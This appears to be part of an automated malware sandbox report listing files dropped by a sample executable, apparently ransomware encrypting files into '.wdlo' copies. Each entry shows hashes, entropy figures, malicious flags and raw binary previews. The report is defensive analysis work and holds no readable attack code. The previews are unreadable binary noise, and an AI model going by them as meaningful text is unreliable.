spBa.B.q..]/..C.N..yY..r.i..m.o.../..b...D]X<.d...S..IY.EL....3.'...]...:.}.p....[...#..W..2........JD..n...;.@..k........Q..a.z.l...o6&.Ya<.F.B..S...(.\Y@U.....2.?EM.......i$....6.....UW..0..|.x..../.vM....|.3.o.'>3....V.8.......r:...58....x./..f1.h.Q....,=.?q...#L8.......6/.....7..4.H....0..F.2!t...8i..9.._.+.v`.M.Z...z.P...#7..Mp......t....zeH.Q..+..'.?U..X.+...|E.^W.X...

                  C:\Users\jones\Local Settings\Temp\offline.session64.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):66542
                  Entropy (8bit):7.997242895004712
                  Encrypted:true
                  SSDEEP:1536:NAoWWYUzCa0emNgKtbb37PzeoRzCSG012wqWt+pLT/9hKro1yqGkFtvV:FfYU9K5/PNlCSo9hKrSPjJV
                  MD5:A97C252EE0B83186D29195BDF2068949
                  SHA1:492998EA302B07D7C52F963D22381F2AF3C24E05
                  SHA-256:12C406DDCEAD81B49F8A7B0EF8207663BBD3599B81B4E512624500FA20F22A13
                  SHA-512:5A6BE5F1FA45678966E5D0C14487B62D8A18A113DC13B10E9DA316401377BBACF3BFF8800F3D9852585324A3DC7599D692EEBC31B6E954F2B196BABEB6D6B0E7
                  Malicious:true
                  Preview:1G.f.mB..c.......<.{jH.]+.&.v.4.C........2...?6....e..0O........{V|.%.!A.w.{]j..:.:%.Bz66.l)JF^.=r.%..:....AW...\...65.'*.w?...p.Q..[.-..&l.F.Q.xL......h....3X.X.p..}2....1....l....!:......h...i3......W...Ck.<......Q..i...FR.`'.,...on..X.Eq.&Mp1.....<dl>.U.0..~.}".e.......q......m..0W......>.#g...iT.Ov....k..Py.9!.....h.L..N..$9Tv..O.z....`...Gj...{a.J..)..'.....]& Xi(U.o.2.L....P..k...r`)I .F.i;A....U_.O]6..aY...i..aLS....~.]..0.=Ctl......B.Z!..a(........l+.W.P.hg%..IuRt'.y6.J#.F.B2.V+u.....r.c..j.MBT..."z...@...D.......B0y..]....4...hq\...u..^.-....h>?3..[.p..a:S9.....+.:.../.:j.QZ+....-.....7..R....UeG#]l.t[.~..;.W.ba.........&....4.)3.m..t........G...ll.a.^:hW.m....z.B.)S..PC.Xq..0V...u...._E)_S..........b4...rM..8S!....J"...Y.InG.S.)Wi"m~C..Ef....H...y.^|.{.d...'.....}..<]|.U.7...ik.%..$,...y.r0.....{...d.>S.....PPc'"4.......+.:..9..e.=f.......<.^B..h..T.=.NE;.>SV.o.. ..)..`...#....g.yC..\..P.V]..W.f..d..Z..............d......BT ....;LqEzJ.

                  C:\Users\jones\Local Settings\Temp\tem4087.tmp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:Unicode text, UTF-16, big-endian text, with no line terminators
                  Category:dropped
                  Size (bytes):540
                  Entropy (8bit):7.609755934263293
                  Encrypted:false
                  SSDEEP:12:Jq+unuIuFxVClm2EjzIQjyuX2699vpSw36Wcii9a:E+unEFQmbjzIQjyq2gxSw3zbD
                  MD5:928C0F31C0E84202536E0AB37004B323
                  SHA1:6ED6ECC46C621A25CF5E834E3AA781B195C2083F
                  SHA-256:F32D074577ACE1636FD660FC8A3467955F55E2E3C6295C240164EA003B2867E5
                  SHA-512:C616106D69B8DC38A62D7934818E8017B99115545BFD7BCED7A18F9AFFFE90C3864C10521682425997895291CAAA8410EF6694D870A5962BF6B05D84A496940C
                  Malicious:false
                  Preview:...I..eS...w...z...d.G......M..+w..)....*.].W.......t.."?..A..?...D...:g.L.Z..F.....Z.....{......^S......z...P...X|.Ck..x.L-......-.B.L.{.a..O.......+.x\K\....F.....>...mf...xl...W.9..\..J..-..lWv.np.....L.]...[.~..=.Sn.j...-MZ.T|.G..aI*e.f..&.].$UF_0.,....y.HKR;9..=Im.8..~^..Ul.[.|.....).q.J<...=.3...41.....).H....j.0b....n(.^..Vi.}%..A....n.........H..*....?...h.....Q{4..%...B.,_&>....`...2F.{..h...vr@oN.......c......P....6..J.,Xz....Mu.%.i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\jones\Local Settings\Temp\tem590C.tmp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:Unicode text, UTF-16, big-endian text, with no line terminators
                  Category:dropped
                  Size (bytes):540
                  Entropy (8bit):7.551321928805971
                  Encrypted:false
                  SSDEEP:12:nfBQRcPrtF/AkskFeYMryCeFPq3wnJvTBnKtwAT2AMk0V36Wcii9a:np46tF/rskAYeAP7n3lm23kG3zbD
                  MD5:74200FF97646FEEE2A592F1DF3539242
                  SHA1:3EB4FA535B66DBF9900F7FC104CFEE728757B528
                  SHA-256:6087E46B586C5E417B225660BEBFD756919C09700A2770DC929A58996B99BCB7
                  SHA-512:15CB242795FCE94E3F15B6C18BE887A66DFA1FF8D6D48B0D4B7FE50AA97F8B0DF5D95654DBFF2D05DE5F0F84BA09EB97D7F9FD71D9FCE48ABBD2E6776CEE3780
                  Malicious:false
                  Preview:...I.<...B...gv..yN.2H.Y7.Q0-..h..........^.=#.....L}9..7........bc...F...9.Q..9i|.Lz....?(D...OY..KI.b..h..n.."jj.I....t!....B."..I...lq..o.&..U...i..?#a.n....>.@.........jd.0..!.NF...^K..c..9t...Q....h2....7'.h.5z.!...|....B1....P}.....Q.D...8(+.IG.F.'.^t<.M.c..I...=.S...N.B..n.h..r..:.....+...}.R2.c......[4^..0....Q.......X..m..E..&{.;P*..0.@.J.B`VJ...oy.....Z.P'.nzd.....g......c&....7....; .../..,6.,\..iO...\.......f.8*(.y.C....O...0&.2k..N.i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\jones\Local Settings\Temp\tem937E.tmp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):540
                  Entropy (8bit):7.619637185398603
                  Encrypted:false
                  SSDEEP:12:C4vFmRODnUt7nXl1qiaLfL7HsmPOmGQ/hjVnXf8HaYJ36Wcii9a:Fwt71aLD7HPPOmGQZj9fOdJ3zbD
                  MD5:F73F9F28BBBCD67762ED87A1ED454FFD
                  SHA1:DE274DCF6D49EC5552C20BD2CC1CEAF93170C19D
                  SHA-256:1DAE4B4C075349173CDC4E5DD3929027E21DFE117FF7754DA8524A1DDAF9AC9A
                  SHA-512:0F9118B5F68E7A034528433B690A48961933E33CE54E1ABBC99023592CB63F7CE7405C4959E6F209E7A9C51FE68452A47E16F0E6DB48DD9F45A4119E71B6389A
                  Malicious:false
                  Preview:...I..U...<...~.b.XJ..."N^.g..m.?Z..m..8X..[He8....=....D.;..Y..cu...K. .w.86.v.uq...KDz.............SE..%JND0p....~...On2N..g.[v.Q.3...][.A..'.w..K&...J...9..a....v$@...G.....p>%eG.iy...9... ..uJ....0.......~e?s....%.=q10@..+.qU.....q.?..".r.D...b...p....8!.fp]h.yK...dU...G.*svv.n{...@..Yv...._Y.<.L.zHL....HRU.../F.-V.s`..o......O.....r<{..m......(&[.=..._..gM...r7....._....8P.b..$*....%..y!O0~..N.h.".F..N..V.7......#.$.".....B..k...i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\jones\Local Settings\Temp\temFD0A.tmp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:Unicode text, UTF-16, big-endian text, with no line terminators
                  Category:dropped
                  Size (bytes):540
                  Entropy (8bit):7.527123408996843
                  Encrypted:false
                  SSDEEP:12:sX+IL1mKSzOjB1ZNEul1idqRW9gZr86bnsWhn36Wcii9a:suILcjzOjP7duAs9gZr86zJ3zbD
                  MD5:E8F99D6B258FCE7B1F69058B9EFA7C35
                  SHA1:77E03E21C514660B6C8A1A87720774365EC0A632
                  SHA-256:AC6EBE6C58F56EC47F63603E10A732768EA754680C8AA0DCE077D4CE05284823
                  SHA-512:CC20F8043BF9592A09B7E9FF086EF8EF837B1EC52BAF294B7E097250DFB3D8A48203419023B733989295F7DB3119142FD471FD3B3451AF3FCA7468AB5659E7BB
                  Malicious:false
                  Preview:...I..9c..1.5.../..........C.V.^'U%........OxR..|*....+.R..z...^...u.njgn\.*.z..u..c6.B4X...d.g..op.b.....;.....Q*.O..3k.Y.O.e^.r.......M^.e-.k..x.e. .~{..Nv;...'..].yf.....h..2.R.2......"Y.._).!....@.`5..6..]..H.7...l.u..T.9.1.v.Z*...U.52...K$?..c#."f..^....5..A$sb..M.l.L.C.u..9.h$E.^............(....=G..#.....$8.....y..5a.9.....k...G..p.V].n..u).k2.p.a=...T?...U.....c..3.......D....d.D@.z...$...c....c.e>E..8...L....ii.b...!e...._Yi0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\jones\Local Settings\Temp\wct150C.tmp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):74540
                  Entropy (8bit):7.997822920015891
                  Encrypted:true
                  SSDEEP:1536:O5RrbIAchmEmYXSdPxNbvOw5MHGXaVJmr9c4R10g0dadyeS:O5RXeAzxPxNa90JmS4eS
                  MD5:FA288DD298CBFBBF82FAF7F94D4DD4F0
                  SHA1:8CB57351872F5CA0D7B456A84F59EC2B9C7EFABC
                  SHA-256:4C0C74980A2D1DA9B1B828042813CB3A886BE3029F8BC4BFA50DD37A3BB034DF
                  SHA-512:ABE1299060E90980953EB21629090EC1208FFC85845E1828AE3956E28808EB689FE24A7EFC94CB29DFE413C075E48E1AF90FCD2116F89C2CCA1FD1860B6FC617
                  Malicious:true
                  Preview:{"ram..o.d...\..+..b.'.d7...XRBj....)x....x;.....x*./Yp..mI.$[LT..........'.&(.}.S..-..z...Er.......d..r..<....1h....P.&...h.}...i.j.%.w....7.].j..f....]..Q...i....?$a.V.../[..v...|_...J}....&..G.u.0....@...>#_H=....u.....t./.h....<.9.X...&8..1%.F0.v.)...-.]..,..Q..&..l*..,......MLx.}.e...u.e....m..r<...v.O.H......%-[iS.Uv~.r ..q.V.XVV.E.|.....s..t.R.My=spn..I....(e.....`R.&.....j......P..V&....#....E"...;...u..7...7.......a]...^.=...]..Xw..!!...(....N.x.3.IH~..p...G2.n.s.K.a..5.$WW.9..46...7...o....J..,,..&..."...bB.........q...1.n$.x[s2v........d...O..._.5a..6.T...H.;$.e6.|.$:..M..h. 1.3.-.X..i63>0....z.h....;..5<...J....3.K(_.w.....J~.h>e..a..6.a.[.x.y.5-.-..h..F.{.kW8.c.!.i...y. ...V.N.kX..6U'dLEwl.r..,...5.`...pi....x.........0h...5...]..e'....@..u...m..t....CU..,Ge..y...m.4/k.,>....z.:.......I...=.h..3...pQ..R....0.).?.M..OSI.....y'=...=U+Iz..6..n0.\...C.9._.a.........(F.EoI....<..'...'.....9.X.1Dw>7*..2.2.!! ...|/U]....8l...S.2..aWG.

                  C:\Users\jones\Local Settings\Temp\wct38F0.tmp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):74540
                  Entropy (8bit):7.997725364221006
                  Encrypted:true
                  SSDEEP:1536:EeRSwyomU1/nPynyEX7zVGyOmN5Mtmspgu+ZyBHKzmh9:92ymVGHs5Ms4zsh8
                  MD5:7BA4DAA574DC97FA4914919D4BEC61E1
                  SHA1:22893ECFCA1889DAD509DECCB9894B1AB358F8F3
                  SHA-256:B502233BE77A1F5818C2097F65F01B71B34FAD1EAD5D39335743A0695D6A337D
                  SHA-512:2F0CE1763C91E2E5C21AB2FA64C5BE982A8F8E32793514C81F524C015B058326E12B3D9422C73601456764C2BE9B36D0154D7A05796F761FF292A1880DA5A114
                  Malicious:true
                  Preview:{"ramfsX0.........Gd..E.....O.+....~.....L.Tm...A.i..c$.1.)._..e?...O.........|.t.5S........`.!B......q........K....,^.3~Y#k....E<..{."~..X.@.G..dX..bY.s...zI.'."Qq.$L.t.f....=....4....[P...g..{.."mdL"[._...le......`jp>=^_....uf....~Rmn....Fp.v8>Q..~/zd.....p.C...b|gu.8.xl...!!5}....@.'...4..Nt-8..9.&...%..vm1.,.d.I...$.......fe...".n..Zl.E.Y.....8..[...*..n.!....Hi..\........e....W.o:eK9... .3...YZ..-.FqC.d..$.s..TZM\.W..K.....C.6~......8i..cl|.8....T........R...].....%....A......i.....U.:.....( .l*...3hvh..De..,..7..F.WS).W...|..[.@.;....V....\n0V..Z.....2.?..8Jr....D.#.O|.t....".1........6|...F!+U.95p.')rM<..{..2....&..9.EF........_....)[.Ek....h`...t:..........w........R...B..E.`u..g7j.......[`.b.,.GM..N..y...D....[:....c%0D6M^M.M%.5..6Y>.8S...D8.j....m....k.-...c.h.....O@)....g..H.d..ZaH.'.=.`.._E....mo..z+.Sx...^Nb........._......{...58.u<.M../..-....*.e.H...U`....{Gu.I.......pc.R..>.,..S...'..M....u....yU]...s...=.mC.Yd.r.

                  C:\Users\jones\Local Settings\Temp\wct3D66.tmp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS-DOS executable
                  Category:dropped
                  Size (bytes):1601198
                  Entropy (8bit):7.987444428387669
                  Encrypted:false
                  SSDEEP:24576:sCrp9QwU70SeiN9YqxCCg83udcWXDYajPF2410wuRpGfFki94qSe/wsNfzUg:11i24gQu3TPZ2psFkiSqwozJ
                  MD5:FD04351634C316F609E3C499CBCE51E9
                  SHA1:36448EED9115F7E28BF2754CF155DEC024513A52
                  SHA-256:E400A9844E62C6A816C5F7F69746981F6C6FCDC73231FD3F24AD48783A9FDC14
                  SHA-512:9BCFCF5C54F5D21DD807FE03987EEB9B1823D2E59921AEAA8E60C87C8F68F2063ABD6F865CB8004B73621FFAA411C6DC706F3D45A026DE77134BCAA4295D9C3F
                  Malicious:true
                  Preview:MZ....&.T,.'...r-...K...p.]4....u...>.....`.S4...(m~cu.......XDt.~v.3A$7.:..O]F....=.g2......Y..K.q^...L...O...{OOL..%...".....D.]...C...A.0.....[.t\.7.Av....f*....!....4...e...^).(...]......5..h=.S..:..k...*....a.PPU*y.^.C. aY9.}..$.".4;?.~......g=....9./..5p.....)s_...............r..0<....3}.-..[..........UA....9..#..d..1B.jr....s...4.........E.\N....[g~B...w.M...MH.>.......P.....\.;..E.d....1.H......`...;D.{..y:.g..........0*..<.D....&4..,O.jC5.2........(i..~..\F.a$.&...b.k;.->q..i.m>.^.NH.L.p..y2..@N/......A`.<...,.N.....3.....7m.?J.?'.......7..y+B8........4a....+.R.@...'{...=......,.CC._...x1.F.K....3....0Em.+,I*.$...<.c...m......Z..;.ah.UVY....d.`.:....../...H.$.d..|p..:..d..E./b...4....K..W&%...Py.#}...c.IEM...#..pK.h&.!..[a.Y.}.C8..W#..f..}a.K.rH...-4.;..iQ.[$(~...K.i.F...@C..`M....Q&..........E......o.~.J....L.e.....+6.I....._`.c...a......h"J=.F._C.'.Ir..........h....y.k@v..<Gf\#.{.WYy%J.,.o.(..z....|....T.....I.,.[.Bk.C.Z..W...u.

                  C:\Users\jones\Local Settings\Temp\wct49A7.tmp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65188
                  Entropy (8bit):7.997387944496603
                  Encrypted:true
                  SSDEEP:1536:EXl3vF8WUhhD4XSZuUEbPJsrFTZ57O1hN8BA+pWvWNbGIz:m9KXhhDISgU4gF21h6BrpWvWxGIz
                  MD5:C57A3AF015483A9DE51D760DAB979707
                  SHA1:EBBAA2696BAB1041D45B130521C4E376147188BB
                  SHA-256:721DA5AC9497E177237AF5A259FD28CF0845FE56C9D9A436EFB1BF8788094BB3
                  SHA-512:CBC9D73CF2AC624CFEB2DB8EBDE05CB110E2EAF70501FFE783E5BB15BEFBAB2205E74E379AD76DE133ADA1852A6797A803321F956D07E3EB7358723D3570A521
                  Malicious:true
                  Preview:{"ram.I.>...0.....F..{..V.h...6.d...Ij.....a.v.5..5.u{...P......M0...:..C...}zH..9/.R..W.........._.._-+G....zxd.g.@.#M4...e...~..bz.ss.C...m.T.N.@.............@R.....j.P[ZG.N.<.).....8ke.\FFWa?.N/9U..k!s&a...\..XZ_.6(..I]......9x....U....)R6.N..t..[.o...>..(............~.=.h.kK*.r3t._.9fjA.Q$...:-.79.-...3.g..$.8.E....d...8..D....{.87..L6y.M...].2.U...6...mB....l.........]+...qBb._.....3kB.V.6.$Z....x..[..M.....>l.....$..."..!.dl.s].0y..X.&t_...d..$8..'...]M/...y....l.Iq.O....4...E...G..$....L1`GF^Lo.h..x.:...e.A...o.@....K.....q......u. ..T..."../Mk)5.....Y}M./*'.VQ&...O<)e.6.p.zE.....E\.e}..l.8..K.&.>.E\.*........{.........-zE.c........onv..;..-.!.4_..~..........r+..5#..`. e.SX....Z!C-~#..3..b...G.<.*. e.b....,.]...VI......$...g......u*j.....l....`.EW_<.3l*K:b......V.}.........:.o..j.K ..V...%...~.t.....*iA.a...9....................ur....4...:..S.|].[;..4.....$..w....mZ..&8..7Kk .|..l.C....q7..b.~P.K..iQ.CE.k..x....qn...S..c.G....d

                  C:\Users\jones\Local Settings\Temp\wctAB5F.tmp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):74525
                  Entropy (8bit):7.997621766829726
                  Encrypted:true
                  SSDEEP:1536:Crw7Jz7YAZQdnmVBWPyPlymGiNnQ5soZhO3l0/v5e+d:yeJz83Y6PCyriNnQqoDO3l0/vVd
                  MD5:19F214398A99EC94207DB71D34A78D8C
                  SHA1:4F87897C8F3E7E1539A7927AB33E81E15DC02A5D
                  SHA-256:05B7A22E5D260E9034038D46F1EA7C93F447FA5E45999B737C21212F745F6408
                  SHA-512:1525E6796E4D030E4F04B529AB2BE47876BC098B785AFECDE8342889028CB05EEB9B4B48C1E4630C5FEC3F3DBB55D657270518F2EC3DC86EA0243B7300123085
                  Malicious:true
                  Preview:{"ram2V....l..I..r`.v.(.J]&.A......H...k...".E-.T.....>#....z6.....`.....xf.^]..!..fc..+.....s.*#......O$fS;\.'...Y...1.....s....>.t...%..tf..Q..g...M...{.,.......#.ddZ.h....I.Yr.d..4..p+...L..vN.!.F..aU..z.r.~......?..W..m.....C.'.0dK..id.R.b.U.E..6......-..k....t.._.O..O..om(_.[...v....J....I.5..Uf...@"}.d...t..5..9F.w..<......q..*o...S{FP{......|.q..O.......M....Ne..xa....'y...:..P.....<...KzUC.n..}.s.O.h..k...........a......Y}-.;.........WX.]..e.oh..K....&...z.......G.j...sB.p>.+SE......Bo..{....n....&8...'&z._..].|...i.|Z....:.~.w..Jh..Pi...8...#. ....=R..X....$.lc.....f...[.K..R.v....M....g<[...{.q|..g...}..Z..|....,..]..`.=..".......Oe.t.;Ml.>7..`...(.3.."..."SK|A....9i\u..w.#P....h..w....;%.cw.\$.....p.3.X....I.a...l..mV...q.6s.>...+.U;.4*...4{..r.3.l.D.."...w. .g....Xa..`Q.H*..Z....].../..P./.)..V.~.T...v....&.c...&1...l2\.:..N./n.D..`U....0..M..B.m..9b.0...eY!F.dq\..@..f......px..#.}.........k...........>... U...d...

                  C:\Users\jones\Local Settings\Temp\wctDB2E.tmp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65188
                  Entropy (8bit):7.9973468161823815
                  Encrypted:true
                  SSDEEP:1536:5I5XSoTTitd3wZTT7cMob5aexdkA5+0ZFxURqQsKEH5H:5I5XAd3w2Vb51x5HZFxoqQsKmV
                  MD5:D9DEB35C91788A53A2223E19F870C87F
                  SHA1:B9FB1631F9AEB307BFBB10D10056CE0E04DECE13
                  SHA-256:21E76F63FCF74E2A836B529BFFEE712CDDC76E7341A349B527205D65C61F4831
                  SHA-512:218192818A5294DFCED3031703DF9E34FB5147E3D1035764D0552684F56D7660ACA0BAECED0DCE2BC1CA3140308ECBEB10442CBF44062313C2592B51B9F167B4
                  Malicious:true
                  Preview:{"ram..yA.^+.....H...@N.o.....rf.?..AE..5ry...Z].~.A...(......@...Y..j.P.......`+pO..9...[+.YG-....?.U.<..Ah1.k`:t.......,.+.'...MP..6....}...N=.Q...=[...=.L.&....6?pu..zQi......~.@.0..rV.;.Zk....m<.. J.JO4b_.#..;._"|...h...7....9T.....iK.M.D1..]N...,Q."w.4.k.:r?j..(.Q/))....wd.....m.l`.X...^..X........_~...D#n..^}..S.........r.5....NY.....a..v..sM^{....M...r.q....8iE&...........+][........'...Z.Y.`.{.p....e.....h.*..y..1..8.t....C....~.]...o.e.r..R8;l.. .....~2..~........'..3..4.).Og.k......p<.C..2V.x.....w..3.C.....J.'.%..Q......i.c5p..RC}....YR......T...C.!.cq.|b...Wm..|.....O...K_....'^....xR...E...4...7.OG.....<.n......A...d.....j.~....TE..9....c v.v'...3EW..>...). ..*..R..qe...U...{W{4dooCV.....\,3...w6.`..X./u~h~...qW;.p....._tGc#r.p..M...[WR.?.a....3{.7`4L..s.\.$-"....x...c...o.B.^.A..t.Ea.Dn..]...t......y.@.v..x....GB........7..<...z..).@;..!6#.r.R....pA.%A.).....1..=}..d.......rx0).]%..R.&..f.6.?xhq.].... .......)....].....2.[J.!

                  C:\Users\jones\Local Settings\Temp\wctE4A4.tmp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):74525
                  Entropy (8bit):7.997327669413282
                  Encrypted:true
                  SSDEEP:1536:K0a8gyew7pS3+UDYcV0lzCv5n6BqE6R3H+xQm96IhOlw:ow7pS3VlxRn6BFw3exaI4y
                  MD5:0A8BAD591E2549F024C533950D06DB1A
                  SHA1:6AA0A1F8D60868755CE7CD231423F7ED5C0F373C
                  SHA-256:81A696E92A550C92858F9FF4794ECAF809A4312E0ADF494EBCF204B47D7DE02E
                  SHA-512:D7E1453CDC25832DCEC55D12CC310B78B4561D3354CF5F28013151DDBEECF93F04232A1DE7452DFC47A641F963449A9E7C34B86774599809547E10E4D3C4C114
                  Malicious:true
                  Preview:{"ram.h..! .....}..{t...P.`.$.....MC........P.Z........L.[...<+.PJ..N.Z.>...*...$..S.F....U.w'.}5.......E.9.....:......(...-...X.....(.........=.:}./.hU...&{..@E.....u....hK.eN.......ib.\@:.v...kd......yG..,'JI. *f]&^...l.z=.g'.:n-z.Jm.4..>..B..W..jx...2.H./[^........Z...k!...../Yb...7Z.^............A.ns.z...j...r.i..`..V.>O...2.Pd9.=<.T..N..5X.|.w=.a....skmJ..B5.1..1!.....&p...a.^.?.>.tBc;.!\4'3.s..O.K.w..K$fi1..:xj....-..u.....CA...;M..r..+..m'..\..C..{BRT..O..(....I......-*..j[.E[q...gZaT.;.<...cOV~.s...x...2...!...........A......Y.....O....D78...cA8.N...iW=.....L..b...pI..>....t.9{..v....y..U.Z..B....4..$.5&z...(..K..l.\.E.3....[........*D...V.....5 ..-;)..."..x2b........E.....g....|..v0.|..".xI...CM'v....|.6...'..%F.Z.!T:...O.J#^Ae...U../...8X..J.4.b...Z.......Q.....C..`..~..OO..x....m...:|C...f."V. 0D.A.|...!...g.~U....Q......).-....e..rW..2.=...*..@O...j.p.}T.....7.0gt`...$.0<Y.......xPi.G.i<.....(SZ..K.p.\..0<._rr.f...;G3

                  C:\Users\jones\Local Settings\Temp\wctEA40.tmp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):74540
                  Entropy (8bit):7.997635543061449
                  Encrypted:true
                  SSDEEP:1536:uxzhr+9cBY9w8eDEm6cVQTqZBABFLHchiktUlwDn7:ez3q9zr9cVQs2FI7owDn7
                  MD5:71E886DA676066D5274662FF896F9118
                  SHA1:3D8D2DAC4B25B277C8ECE86ABCE7B021897000D0
                  SHA-256:A30557E6EA3785555437FA840322C4C214C1ECE6C68A91ADB26EE82AB5D455C3
                  SHA-512:0DAAF99AC83283652D764B4D5E99E1D07AEB2712D2744DBC4CDF911B14F3E77F90939CB8F145A98B3B2610710AB23E6E914C122B473557EDC774209082E8E533
                  Malicious:true
                  Preview:{"ram/e}./..5.P...v... .4M....OA1.....x#..P(-V3D.:.7.../...~].kr.....&. ....A.Li.Rl.^..[..&..+..4.Qa.....<........q.+i...E.$).......=.5..m..:.*...CU.OJ5o.f3..Ltn%V........6..4...n~.....Q.......a.].....P........4<x*.e1.._..a..LJ.b...#:>,.._0.J.s..$.*.WM.. ..6.....Dr...3.H.6s.}.P3.......U..<.&.Y...F...q.T.+..l....b.>...uE.....8....I.cT.....h..W.E...J..p....{..[..|.(...e.4.i1Q.8...'.u....<.u.P..x..r...%/M..*5...0..%.x......4yb8.I...=&qW.0.P<h!..I(..2<9....;]G..%...p.<#..=t..OW!..#a.....T.F.<..v.H.N_..w....d.......H.\..4q....qH.@..jG...*./.q....].O<.>..o,3..sj..QZ.Nt.N._.B.19_..-....R....2H.BAl#......K...N..f..q..0..ws......*1.."..&Z<2.XdQ\.i...a...o...<.Z.......f".b...E.T..E.....G .q.JX.......2.G..GD)...4..../._G......R...lw.Tv...#^...RH........9$RD.dPk3..l&C..w.iM..*o.s..N..>..*.;E...Y.R.n..f(.\{N2........}../q...o...!.Q......t.........?"...Ih..~.fF...}.&C.3.X....9..n.U.....[4H!/..7.....!.A.....y4.&.u.[.u=...G_..!.S/.C.N..^^?.5...O.<j

                  C:\Users\jones\Local Settings\Temp\wctF86A.tmp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS-DOS executable
                  Category:dropped
                  Size (bytes):42164934
                  Entropy (8bit):7.9476699167460305
                  Encrypted:false
                  SSDEEP:786432:OwQNeYDxVRrMPJy7LVV4NDDmdrZy9wOtg5gGOdjtjSNu4GIluUNj56I59G:HQcWxDMPnN+dk65gGUjku4vNjLjG
                  MD5:09A557E31FC888DAEBF2FB08F2118DC3
                  SHA1:BE8F2396A135C451D02D400CBA880A65C60565EF
                  SHA-256:6E8C9EE6B7261002F934020887A3824E5859F595BCD20F06E19DA1C03FEA5E51
                  SHA-512:02DED5E69789ABFE93101EFE60FEC2F5831E483427C2EEB9A00DD8FF8E19E64F2419099DE27320812AA3A4FA315E413C4775733A2E016F7F60F6379287EE2A8E
                  Malicious:true
                  Preview:MZ...yN.3....Tt...<.Y..0....Wd.K.-..B.....V..L...@....;..'...3B6.F...'.VT.,...!..W..yjI.a.s.Ev..V.*4...,.z..`a..CB;h.B.E=......./..../M.....2..K..V....}.zJ..L.~..s..M..=.2.aQ.)of,...,.8.-p..=..J"...o.t.~....Rr....pg.8..b'..q.F.Zy>..B.c...V.....3.V.'y.............{Ml.... ..2...p.Y6..^..qU.)..Bv.).mp.X.{.).0.4Ih?.....p.iTk.=].=.M..?0..."'`..Y...n.6.=3F. .nD.c.X..:....cz....!h.2...+Q......u...:...ER...jA......]....=..s/.f&.....|...X.tZ@.."Gm..7.W.R3.....~...^.2..Q>.r..:QJ.NqbU............v.V$....Q!.0.......>U...J..u .;.[i.hn4Q..0...r...w...#.O}.h.-...'{...JD..o..N|.m.8a.csQ..=.gN.0./4R....4.....7.-....D...p.]_H.7........@.y......?a._HuT-..0.'.g..x.....9C....K.....F24;...|..A. s..fV...$.r.[....Z.r..L[t..H..K..a,4.O.^..,..;.Gvvs..A.;v2VKW..F.k.=.. ...#e.m......n..#.N............q'....yD.^ .W...f"....<.....n.S.kzT)..;h.>.....B..P.2...1.!.R.r`...X.C...27..B.K..P...aw..d'.K.oA......`.WG.GrBO.6.q.Dv.g...\...N..*...j;..1...B..+G...m.#]Fr.2(...tL/....k..(.

                  C:\Users\jones\Local Settings\Temp\wmsetup.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1031
                  Entropy (8bit):7.806310167000348
                  Encrypted:false
                  SSDEEP:24:tv3kr0bEuh53PZYKEsyopeHer7HO1XBMNz4nztCE9Q8z7ksYo43zbD:OrmEuhNOK7yopKW61RMNz4pCE9Qik/3D
                  MD5:38F825A4277DED31C811B1E8A953BFD4
